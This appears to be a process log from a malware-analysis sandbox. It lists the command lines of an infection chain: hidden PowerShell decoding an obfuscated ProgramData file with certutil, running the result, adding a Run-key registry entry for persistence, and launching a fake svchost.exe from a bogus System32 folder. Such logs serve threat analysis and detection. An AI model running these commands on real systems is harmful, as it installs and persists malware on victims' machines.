powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden certutil -decode C:\Windows\..\ProgramData\bgn9jPn.g6Ky C:\Windows\..\ProgramData\jB2OWAx.lEKR
2788 certutil.exe "C:\Windows\system32\certutil.exe" -decode C:\Windows\..\ProgramData\bgn9jPn.g6Ky C:\Windows\..\ProgramData\jB2OWAx.lEKR
2904 powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden cmd /c cmd /c C:\Windows\..\ProgramData\jB2OWAx.lEKR --user
2964 reg.exe reg add hkcu\software\microsoft\windows\currentversion\run /d "\"C:\ProgramData\System32\svchost.exe\" --help" /t REG_SZ /v "System" /f
1356 svchost.exe "C:\ProgramData\System32\svchost.exe" --help "C:\ProgramData\jB2OWAx.lEKR"
2176